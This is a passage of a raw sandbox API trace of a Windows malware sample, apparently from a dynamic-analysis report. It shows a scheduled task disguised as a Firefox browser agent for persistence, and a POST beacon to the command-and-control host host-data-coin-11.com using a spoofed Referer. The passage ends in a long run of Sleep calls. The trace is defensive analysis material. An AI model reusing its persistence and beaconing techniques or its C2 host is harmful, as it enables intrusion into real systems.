[5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x6e6fd18 | out: ppvObject=0x6e6fd18*=0x13f7b0) returned 0x0 [0089.098] IExecAction:put_Path (This=0x13f7b0, Path="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 0x0 [0089.098] IUnknown:Release (This=0x13f7b0) returned 0x2 [0089.098] ITaskFolder:RegisterTaskDefinition (in: This=0x126130, Path="Firefox Default Browser Agent 4BCD659AD8F347B5", pDefinition=0x12b920, flags=6, UserId=0x6e6fd40*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), password=0x6e6fd80*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), LogonType=3, sddl=0x6e6fd60*(varType=0x0, wReserved1=0x390, wReserved2=0x0, wReserved3=0x0, varVal1=0x3935257, varVal2=0x0), ppTask=0x6e6fce0 | out: ppTask=0x6e6fce0*=0x13f890) returned 0x0 [0089.801] IUnknown:Release (This=0x13f7b0) returned 0x1 [0089.801] IUnknown:Release (This=0x13f5e0) returned 0x1 [0089.801] TaskScheduler:IUnknown:Release (This=0x12b920) returned 0x0 [0089.801] TaskScheduler:IUnknown:Release (This=0x126130) returned 0x0 [0089.801] TaskScheduler:IUnknown:Release (This=0x10aab0) returned 0x0 [0089.801] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52940) returned 0x10d [0089.801] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52940) returned 1 [0089.801] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x418 [0089.802] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0089.802] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52720) returned 0x212 [0089.802] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52720) returned 1 [0089.802] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1280 [0089.803] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 0x1588 [0089.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x26) returned 0x7f52300 [0089.803] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3026b562 [0089.803] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x46) returned 0x7f52330 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x39490312 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x738b4355 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x32440e6f [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x692b816a [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xc3e0613 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7736a268 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c413cb4 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2b87d11b [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78b1bbc9 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7814ec3 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xeebba5b [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6fbc1111 [0089.803] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x12ea3b7b [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xb4a77a3 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x63eef08a [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x20d60f93 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2c0eb4d0 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x135179da [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x149059d4 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78e8760c [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7b006fd8 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23a3926c [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x176a31d2 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7847bb47 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c06d1c1 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7e212a27 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x390b1c29 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3636bd05 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x603543b9 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x431a8c32 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x151887bc [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x378440d7 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xe2b8eea [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x24456e6d [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1193b33 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x21f95e97 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x72a0a57f [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7ae627dc [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x15d24c4c [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38f3cdb2 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6cc8b46 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x390b1c29 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6c325bb1 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x78a17cd7 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x66acbe20 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x32bf9fd8 [0089.804] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2147b2c2 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x70fd947d [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6f20e447 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x22813592 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c413cb4 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x11ff9f00 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x660c8613 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1c7b8ddf [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4290d864 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x19a00554 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xc3e0613 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x12cd70e0 [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6356c5e [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5ddd392b [0089.805] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2c8d9293 [0089.805] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x95) returned 0x7f52380 [0089.805] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0089.805] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0089.805] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0089.805] lstrcatA (in: lpString1="", lpString2="m\"`GHCqfvR\"`z(+`;a?A!A=\\B02n,[)\"=f@2JY)sM2r&O1wVd_q;ZbmCHacHL" | out: lpString1="m\"`GHCqfvR\"`z(+`;a?A!A=\\B02n,[)\"=f@2JY)sM2r&O1wVd_q;ZbmCHacHL") returned="m\"`GHCqfvR\"`z(+`;a?A!A=\\B02n,[)\"=f@2JY)sM2r&O1wVd_q;ZbmCHacHL" [0089.805] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10c) returned 0x7f52420 [0089.805] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0089.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f52300, cbMultiByte=30, lpWideCharStr=0x7f52420, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0089.805] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x6e6fbf8 | out: pProxyConfig=0x6e6fbf8) returned 1 [0089.824] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3faf720 [0089.946] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x6e6fcb0 | out: lpUrlComponents=0x6e6fcb0) returned 1 [0089.947] WinHttpConnect (hSession=0x3faf720, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83be0 [0089.978] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52540 [0089.978] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x68) returned 0x7f52560 [0089.979] WinHttpOpenRequest (hConnect=0x3f83be0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x714a870 [0089.979] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x4e) returned 0x7f525d0 [0089.979] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f52630 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2204dd35 [0089.979] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52750 [0089.979] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x17) returned 0x7f52770 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5b9d2b03 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x224f120a [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x176a31d2 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x40023a78 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x531e925f [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d9973ed [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3a54a334 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4aef1b24 [0089.979] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x39490312 [0089.979] wsprintfW (in: param_1=0x7f52630, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://gnoeehlb.com/") returned 42 [0089.979] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52770) returned 0x17 [0089.979] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52770) returned 1 [0089.979] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52750) returned 0x12 [0089.979] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52750) returned 1 [0089.979] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f525d0) returned 0x4e [0089.980] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f525d0) returned 1 [0089.980] WinHttpAddRequestHeaders (hRequest=0x714a870, pwszHeaders="Accept: */*\r\nReferer: http://gnoeehlb.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0089.980] WinHttpSendRequest (hRequest=0x714a870, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f52380*, dwOptionalLength=0x8c, dwTotalLength=0x8c, dwContext=0x0) returned 1 [0091.182] WinHttpReceiveResponse (hRequest=0x714a870, lpReserved=0x0) returned 1 [0091.183] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x2800) returned 0x7f52750 [0091.184] WinHttpReadData (in: hRequest=0x714a870, lpBuffer=0x7f52750, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f52750*, lpdwNumberOfBytesRead=0x6e6fd68*=0x18) returned 1 [0091.185] RtlReAllocateHeap (Heap=0x7f50000, Flags=0x8, Ptr=0x7f52750, Size=0x5000) returned 0x7f54f60 [0091.186] WinHttpReadData (in: hRequest=0x714a870, lpBuffer=0x7f54f78, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x6e6fd68 | out: lpBuffer=0x7f54f78*, lpdwNumberOfBytesRead=0x6e6fd68*=0x0) returned 1 [0091.187] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3950000 [0091.189] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f54f60) returned 1 [0091.189] WinHttpCloseHandle (hInternet=0x714a870) returned 1 [0091.189] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52630) returned 0x10d [0091.189] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52630) returned 1 [0091.189] WinHttpCloseHandle (hInternet=0x3f83be0) returned 1 [0091.189] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52560) returned 0x68 [0091.189] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52560) returned 1 [0091.190] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52540) returned 0x12 [0091.190] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52540) returned 1 [0091.190] WinHttpCloseHandle (hInternet=0x3faf720) returned 1 [0091.190] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52420) returned 0x10c [0091.190] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52420) returned 1 [0091.190] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52330) returned 0x46 [0091.191] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52330) returned 1 [0091.191] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52380) returned 0x95 [0091.191] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52380) returned 1 [0091.191] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0091.191] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x15) returned 0x7f52330 [0091.191] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0091.191] lstrlenA (lpString="plugin_size") returned 11 [0091.191] atoi (_Str="0") returned 0 [0091.191] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0091.191] lstrlenA (lpString="|:|") returned 3 [0091.192] MapViewOfFile (hFileMappingObject=0x1588, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x97a0000 [0091.204] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0091.205] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x97a0000) returned 0x0 [0091.233] atoi (_Str="0") returned 0 [0091.234] VirtualFree (lpAddress=0x3950000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.235] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52300) returned 0x26 [0091.235] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52300) returned 1 [0091.235] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0091.235] Sleep (dwMilliseconds=0x258) [0091.839] Sleep (dwMilliseconds=0x258) [0092.557] Sleep (dwMilliseconds=0x258) [0093.169] Sleep (dwMilliseconds=0x258) [0093.792] Sleep (dwMilliseconds=0x258) [0094.398] Sleep (dwMilliseconds=0x258) [0095.007] Sleep (dwMilliseconds=0x258) [0095.615] Sleep (dwMilliseconds=0x258) [0096.223] Sleep (dwMilliseconds=0x258) [0096.831] Sleep (dwMilliseconds=0x258) [0097.443] Sleep (dwMilliseconds=0x258) [0098.049] Sleep (dwMilliseconds=0x258) [0098.658] Sleep (dwMilliseconds=0x258) [0099.273] Sleep (dwMilliseconds=0x258) [0100.847] Sleep (dwMilliseconds=0x258) [0101.745] Sleep (dwMilliseconds=0x258) [0102.354] Sleep (dwMilliseconds=0x258) [0103.883] Sleep (dwMilliseconds=0x258) [0103.898] Sleep (dwMilliseconds=0x258) [0103.914] Sleep (dwMilliseconds=0x258) [0103.929] Sleep (dwMilliseconds=0x258) [0103.947] Sleep (dwMilliseconds=0x258) [0103.960] Sleep (dwMilliseconds=0x258) [0104.023] Sleep (dwMilliseconds=0x258) [0104.039] Sleep (dwMilliseconds=0x258) [0104.055] Sleep (dwMilliseconds=0x258) [0104.071] Sleep (dwMilliseconds=0x258) [0104.085] Sleep (dwMilliseconds=0x258) [0104.101] Sleep (dwMilliseconds=0x258) [0104.117] Sleep (dwMilliseconds=0x258) [0104.179] Sleep (dwMilliseconds=0x258) [0104.202] Sleep (dwMilliseconds=0x258) [0104.210] Sleep (dwMilliseconds=0x258) [0104.225] Sleep (dwMilliseconds=0x258) [0104.242] Sleep (dwMilliseconds=0x258) [0104.262] Sleep (dwMilliseconds=0x258) [0104.273] Sleep (dwMilliseconds=0x258) [0104.335] Sleep (dwMilliseconds=0x258) [0104.351] Sleep (dwMilliseconds=0x258) [0104.366] Sleep (dwMilliseconds=0x258) [0104.381] Sleep (dwMilliseconds=0x258) [0104.400] Sleep (dwMilliseconds=0x258) [0104.413] Sleep (dwMilliseconds=0x258) [0104.432] Sleep (dwMilliseconds=0x258) [0104.491] Sleep (dwMilliseconds=0x258) [0104.518] Sleep (dwMilliseconds=0x258) [0104.523] Sleep (dwMilliseconds=0x258) [0104.537] Sleep (dwMilliseconds=0x258) [0104.572] Sleep (dwMilliseconds=0x258) [0104.591] Sleep (dwMilliseconds=0x258) [0104.601] Sleep (dwMilliseconds=0x258) [0104.662] Sleep (dwMilliseconds=0x258) [0104.683] Sleep (dwMilliseconds=0x258) [0104.694] Sleep (dwMilliseconds=0x258) [0104.711] Sleep (dwMilliseconds=0x258) [0104.735] Sleep (dwMilliseconds=0x258) [0104.741] Sleep (dwMilliseconds=0x258) [0104.758] Sleep (dwMilliseconds=0x258) [0104.772] Sleep (dwMilliseconds=0x258) [0104.834] Sleep (dwMilliseconds=0x258) [0104.850] Sleep (dwMilliseconds=0x258) [0104.865] Sleep (dwMilliseconds=0x258) [0104.881] Sleep (dwMilliseconds=0x258) [0104.899] Sleep (dwMilliseconds=0x258) [0104.917] Sleep (dwMilliseconds=0x258) [0104.959] Sleep (dwMilliseconds=0x258) [0105.006] Sleep (dwMilliseconds=0x258) [0105.021] Sleep (dwMilliseconds=0x258) [0105.037] Sleep (dwMilliseconds=0x258) [0105.052] Sleep (dwMilliseconds=0x258) [0105.068] Sleep (dwMilliseconds=0x258) [0105.083] Sleep (dwMilliseconds=0x258) [0105.099] Sleep (dwMilliseconds=0x258) [0105.162] Sleep (dwMilliseconds=0x258) [0105.177] Sleep (dwMilliseconds=0x258) [0105.193] Sleep (dwMilliseconds=0x258) [0105.208] Sleep (dwMilliseconds=0x258) [0105.225] Sleep (dwMilliseconds=0x258) [0105.240] Sleep (dwMilliseconds=0x258) [0105.261] Sleep (dwMilliseconds=0x258) [0105.318] Sleep (dwMilliseconds=0x258) [0105.339] Sleep (dwMilliseconds=0x258) [0105.349] Sleep (dwMilliseconds=0x258) [0105.364] Sleep (dwMilliseconds=0x258) [0105.380] Sleep (dwMilliseconds=0x258) [0105.395] Sleep (dwMilliseconds=0x258) [0105.411] Sleep (dwMilliseconds=0x258) [0105.427] Sleep (dwMilliseconds=0x258) [0105.490] Sleep (dwMilliseconds=0x258) [0105.505] Sleep (dwMilliseconds=0x258) [0105.520] Sleep (dwMilliseconds=0x258) [0105.536] Sleep (dwMilliseconds=0x258) [0105.551] Sleep (dwMilliseconds=0x258) [0105.567] Sleep (dwMilliseconds=0x258) [0105.583] Sleep (dwMilliseconds=0x258) [0105.645] Sleep (dwMilliseconds=0x258) [0105.662] Sleep (dwMilliseconds=0x258) [0105.676] Sleep (dwMilliseconds=0x258) [0105.692] Sleep (dwMilliseconds=0x258) [0105.708] Sleep (dwMilliseconds=0x258) [0105.735] Sleep (dwMilliseconds=0x258) [0105.742] Sleep (dwMilliseconds=0x258) [0105.801] Sleep (dwMilliseconds=0x258) [0105.827] Sleep (dwMilliseconds=0x258) [0105.833] Sleep (dwMilliseconds=0x258) [0105.848] Sleep (dwMilliseconds=0x258) [0105.864] Sleep (dwMilliseconds=0x258) [0105.880] Sleep (dwMilliseconds=0x258) [0105.895] Sleep (dwMilliseconds=0x258) [0105.911] Sleep (dwMilliseconds=0x258) [0105.973] Sleep (dwMilliseconds=0x258) [0105.993] Sleep (dwMilliseconds=0x258) [0106.004] Sleep (dwMilliseconds=0x258) [0106.021] Sleep (dwMilliseconds=0x258) [0106.037] Sleep (dwMilliseconds=0x258) [0106.052] Sleep (dwMilliseconds=0x258) [0106.067] Sleep (dwMilliseconds=0x258) [0106.082] Sleep (dwMilliseconds=0x258) [0106.144] Sleep (dwMilliseconds=0x258) [0106.161] Sleep (dwMilliseconds=0x258) [0106.176] Sleep (dwMilliseconds=0x258) [0106.192] Sleep (dwMilliseconds=0x258) [0106.208] Sleep (dwMilliseconds=0x258) [0106.223] Sleep (dwMilliseconds=0x258) [0106.238] Sleep (dwMilliseconds=0x258) [0106.300] Sleep (dwMilliseconds=0x258) [0106.316] Sleep (dwMilliseconds=0x258) [0106.332] Sleep (dwMilliseconds=0x258) [0106.349] Sleep (dwMilliseconds=0x258) [0106.363] Sleep (dwMilliseconds=0x258) [0106.378] Sleep (dwMilliseconds=0x258) [0106.394] Sleep (dwMilliseconds=0x258) [0106.456] Sleep (dwMilliseconds=0x258) [0106.476] Sleep (dwMilliseconds=0x258) [0106.487] Sleep (dwMilliseconds=0x258) [0106.503] Sleep (dwMilliseconds=0x258) [0106.525] Sleep (dwMilliseconds=0x258) [0106.537] Sleep (dwMilliseconds=0x258) [0106.552] Sleep (dwMilliseconds=0x258) [0106.566] Sleep (dwMilliseconds=0x258) [0106.628] Sleep (dwMilliseconds=0x258) [0106.653] Sleep (dwMilliseconds=0x258) [0106.659] Sleep (dwMilliseconds=0x258) [0106.676] Sleep (dwMilliseconds=0x258) [0106.691] Sleep (dwMilliseconds=0x258) [0106.706] Sleep (dwMilliseconds=0x258) [0106.734] Sleep (dwMilliseconds=0x258) [0106.738] Sleep (dwMilliseconds=0x258) [0106.799] Sleep (dwMilliseconds=0x258) [0106.822] Sleep (dwMilliseconds=0x258) [0106.834] Sleep (dwMilliseconds=0x258) [0106.847] Sleep (dwMilliseconds=0x258) [0106.862] Sleep (dwMilliseconds=0x258) [0106.878] Sleep (dwMilliseconds=0x258) [0106.893] Sleep (dwMilliseconds=0x258) [0106.956] Sleep (dwMilliseconds=0x258) [0106.972] Sleep (dwMilliseconds=0x258) [0106.987] Sleep (dwMilliseconds=0x258) [0107.003] Sleep (dwMilliseconds=0x258) [0107.018] Sleep (dwMilliseconds=0x258) [0107.034] Sleep (dwMilliseconds=0x258) [0107.049] Sleep (dwMilliseconds=0x258) [0107.112] Sleep (dwMilliseconds=0x258) [0107.127] Sleep (dwMilliseconds=0x258) [0107.143] Sleep (dwMilliseconds=0x258) [0107.159] Sleep (dwMilliseconds=0x258) [0107.174] Sleep (dwMilliseconds=0x258) [0107.190] Sleep (dwMilliseconds=0x258) [0107.205] Sleep (dwMilliseconds=0x258) [0107.268] Sleep (dwMilliseconds=0x258) [0107.283] Sleep (dwMilliseconds=0x258) [0107.299] Sleep (dwMilliseconds=0x258) [0107.314] Sleep (dwMilliseconds=0x258) [0107.330] Sleep (dwMilliseconds=0x258) [0107.345] Sleep (dwMilliseconds=0x258) [0107.361] Sleep (dwMilliseconds=0x258) [0107.423] Sleep (dwMilliseconds=0x258) [0107.444] Sleep (dwMilliseconds=0x258) [0107.455] Sleep (dwMilliseconds=0x258) [0107.470] Sleep (dwMilliseconds=0x258) [0107.487] Sleep (dwMilliseconds=0x258) [0107.502] Sleep (dwMilliseconds=0x258) [0107.517] Sleep (dwMilliseconds=0x258) [0107.579] Sleep (dwMilliseconds=0x258) [0107.595] Sleep (dwMilliseconds=0x258) [0107.611] Sleep (dwMilliseconds=0x258) [0107.629] Sleep (dwMilliseconds=0x258) [0107.642] Sleep (dwMilliseconds=0x258) [0107.657] Sleep (dwMilliseconds=0x258) [0107.673] Sleep (dwMilliseconds=0x258) [0107.736] Sleep (dwMilliseconds=0x258) [0107.756] Sleep (dwMilliseconds=0x258) [0107.767] Sleep (dwMilliseconds=0x258) [0107.782] Sleep (dwMilliseconds=0x258) [0107.799] Sleep (dwMilliseconds=0x258) [0107.813] Sleep (dwMilliseconds=0x258) [0107.838] Sleep (dwMilliseconds=0x258) [0107.855] Sleep (dwMilliseconds=0x258) [0107.907] Sleep (dwMilliseconds=0x258) [0107.927] Sleep (dwMilliseconds=0x258) [0107.939] Sleep (dwMilliseconds=0x258) [0107.954] Sleep (dwMilliseconds=0x258) [0107.970] Sleep (dwMilliseconds=0x258) [0107.985] Sleep (dwMilliseconds=0x258) [0108.003] Sleep (dwMilliseconds=0x258) 